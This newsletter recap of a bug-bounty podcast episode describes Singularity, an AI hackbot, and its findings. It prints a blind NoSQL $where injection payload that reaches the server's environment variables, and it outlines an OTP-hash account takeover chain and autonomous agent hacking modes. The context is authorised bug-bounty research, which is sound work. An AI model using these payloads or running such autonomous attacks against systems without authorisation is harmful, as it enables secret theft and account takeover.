[HackerNotes Ep. 181] Inside Singularity, the Hackbot of xssdoctor and Rez0

We dig deep some features of Singularity, the hackbot Rez0 and xssdoctor built

Hacker TL;DR

  • A wide-scope hackbot pulled 60 to 80 solid bugs in six months, including a blind MongoDB $where injection that turned into env exfil, a bug class most of us gave up on years ago.

  • Chain more LLMs, not fewer. Dropping a boss/overseer in the middle plus an escalation agent and a validator made the output go up, not down.

  • Auth is still the wall. Around 80% of tokens were getting burned on login and captcha loops until they actually measured it.

  • AI gives you scale, not spidey sense. Offload the grind and the "dead" bug classes to the bot, keep the lead-to-finding judgment for yourself.

Today's Sponsor: Check out Zero Trust Cloud Access from ThreatLocker https://www.criticalthinkingpodcast.io/tl-ztca

Who's JD

JD, aka xssdoctor, is a cardiologist who hacks on the side. He is now well known on the pod with all the stuff he produced like Hackalongs on our Discord. He spent last year going deep on client-side, window references, postMessage, the whole browser-side skill tree, and he is now pushing into server-side and hardware. Singularity is the wide-scope hackbot he and Rez0 built together starting back in January, right after new Opus model dropped.

Blind NoSQL Injection to Env Exfil

It is a great example of the bot finding something a human would have walked past.

The target looked like a plain GraphQL API. Nested inside the query was a JSON-shaped parameter, and the bot noticed the backend was actually MongoDB parsing backend JavaScript. That is the $where door. The key in the object is $where, the value is a string that gets evaluated server-side as JS.

First you confirm it with a trivial truth oracle:

{ "$where": "1 == 1" }

If 1 == 1 flips behavior, you are running backend JavaScript. From there you escape to the Function constructor and reach into the process:

{ "$where": "this.constructor.constructor('return globalThis.process')().env.NODE_ENV[0] === 'd'" }

No data comes back directly, so it is fully blind. The response only tells you true or false, which means you binary-search every character of every value you want. Claude wrote the extraction script itself and pulled the environment variables out character by character, including the access token sitting in env. The report also folded in a prototype pollution angle, which is exactly the kind of detail that makes a bug fun instead of just a payout.

It was triaged as a critical in about ten minutes.

The interesting part is not just the payload, it is the meta. This is straight out of the PortSwigger NoSQL module. JD used to look for it manually on every Mongo target, never found it, and eventually filed it under "dead, nobody runs backend JS anymore." The bot never filed it under anything. It just kept checking, on every host, forever, and on this one it paid off. That is the whole pitch for scale: bugs that live on one in ten thousand hosts are not worth a human checking for, and are trivial for a bot to check everywhere.

Google OTP Hash Leak

Second one, found basically manually by the bot on a lower-severity Google service. When you requested an OTP, the response handed back a bcrypt hash of that OTP. Crackable on rentable hardware in roughly two hours. So the chain is: trigger a password reset, grab the hash from the response, crack it offline, use the OTP, take over the account. Clean account takeover off a single leaked hash in a response body.

Singularity Has Three Moving Parts

If you want to build one of these, this is the mental model they landed on. There are three distinct problems and they each caused pain at different points over the six months.

  1. The thing that hacks. The worker, the hunter. This is the agent actually touching the target.

  2. The thing that tells it to hack. The boss, the orchestrator. It picks scope, kicks off workers, tells them to go back and dig harder, decides when to scale up and when you are about to run out of tokens.

  3. The thing you interact with. For Singularity that is a custom Discord. Findings drop as PDFs in one channel, reports as markdown in another, and on a busy day you are looking at around 50 alerts.

One detail worth stealing: live log injection. You can click into a running worker's log and type straight into the bot mid-run to nudge it. JD uses it constantly when he has nothing else to do, and it is how a lot of the tuning happened.

We do subs at $25, $10, and $5, premium subscribers get access to:

Hackalongs: live bug bounty hacking on real programs, VODs available
Live data streams, exploits, tools, scripts & un-redacted bug reports

Need a Pentest? We just launched CTBB Pentests!

Hack full time? Check out the Full-Time Hunter’s Guild!

The 80% Auth Tax

Early on the token bill was getting torched in about two days with barely any findings to show for it. So they actually instrumented it and pulled the metrics. The bot was spending roughly 80% of its tokens on authentication and only 20% on hacking. It was trying to log in over and over, multiple ways, and burning whole runs on "let's try to solve this captcha a hundred million times."

The lesson is blunt: if you are not measuring where your tokens go, you are probably paying to watch an agent fight a login form. Measure first.

More LLMs, Not Fewer

The original design had hard-coded phases: recon, then hack, then review and chain. That got ripped out. Instead there is an actual boss/overseer LLM sitting between the operators and the worker, and instead of a dumb "you're doing great, keep going" loop, it says "no, you missed this and this, go back and do that."

Counterintuitively, adding LLMs into the chain made things sharper, not noisier. Two pieces carry a lot of the weight here:

  • Escalation agent. Before a finding ever reaches validation, this agent tries to escalate it. Low to medium, medium to high, medium to critical. There are escalation logs and it genuinely moves severity up when the impact is there.

  • Validator agent. It takes the finding, sometimes already escalated, and is told to reproduce it skeptically, like a triager who wants to reject it. The worker gets excited and wants to find a bug. The validator wants to invalidate it. That tension is the point, and it is rare for the validator to be wrong. If it checks out, it writes the report with the full reporting skill attached.

Output roughly tripled after the middle LLM went in. At minimum it broke the plateau the bot had stalled on.

Hail Mary Mode

This one is exactly what it sounds like. You point it at a target and tell it to go until it finds something. If it cannot find a bug in the app, go after the libraries and dependencies. If not there, go after the protocol itself. The orchestrator spins up a dedicated fuzzing agent that does weird mutations, hands back a fuzzing list, the orchestrator reasons over it and says "go hit this endpoint," and builds the whole work order from there.

It is underused and it hits almost every time it runs. There is a lot of meat left on that bone.

Auth Is Still the Wall

Quick disambiguation, because "auth" means two things in this world. There is agent auth (how you authenticate to Claude or Codex) and there is target auth (logging the bot into the program). The second one is the holy grail, and nobody has fully cracked it.

The problems stack up fast:

  • Headless terminals limit how the agent talks to real sites, and big targets gate everything behind captchas that Playwright does not beat reliably, no matter what the captcha-solver vendors promise. Think about it from the defender's side: Amazon's captcha is not there to stop hackers, it is there to stop scraping, and they have a whole team whose job is to keep you out.

  • Headed browsers work but cost you a real machine with a screen, which then restarts, updates, and drifts on you.

  • Token refresh logic breaks silently. A target refreshes auth every fifteen minutes, logging in elsewhere invalidates the refresh, and three weeks later you realize the keep-alive has been dead the whole time. No wonder there were no bugs on that program.

The reason this matters so much: the authenticated realm is where the bugs live. There are pure automators who beat all of us at unauthenticated bugs without AI. The edge is in the logged-in surface, and that is precisely the surface auth problems keep you out of. The deep, single-target hackbot from the recent Google episode did so well in part because it took auth out of the equation and stayed unauthenticated, which is genius, but it is the exception.

The boredom of being a bug hunter now

Worth saying out loud because it came up hard in this episode. Watching a fake intelligence find bugs you would never have found does something to the motivation. Popping a critical used to be rare and you would be proud of it. Now criticals and highs roll in constantly, from you and from your agents, and each one lands a little softer. Finding a medium by hand can genuinely feel better than the bot popping a critical.

The counterweight is that AI is also the best way to learn a new skill fast. Reproducing the bugs the bot finds is how JD is getting better at server-side, a whole area he used to write off as not real. And learning a brand new thing, hardware in his case, with AI as the study guide, brought the passion right back.

Two framings to leave with. One, the watchmaker analogy from Hakluke's post: quartz killed the watchmakers who refused to adapt and made the ones who pivoted thrive. The hunters who use AI to go deeper and wider will be fine, the ones who do not will not. Two, the rule that keeps coming up: whatever AI does, it does it better when you are already good at the thing. Getting good at things using AI makes your AI better. So do not stop learning the actual craft just because the bot can do it.

Resources

That's it for the week, keep hacking!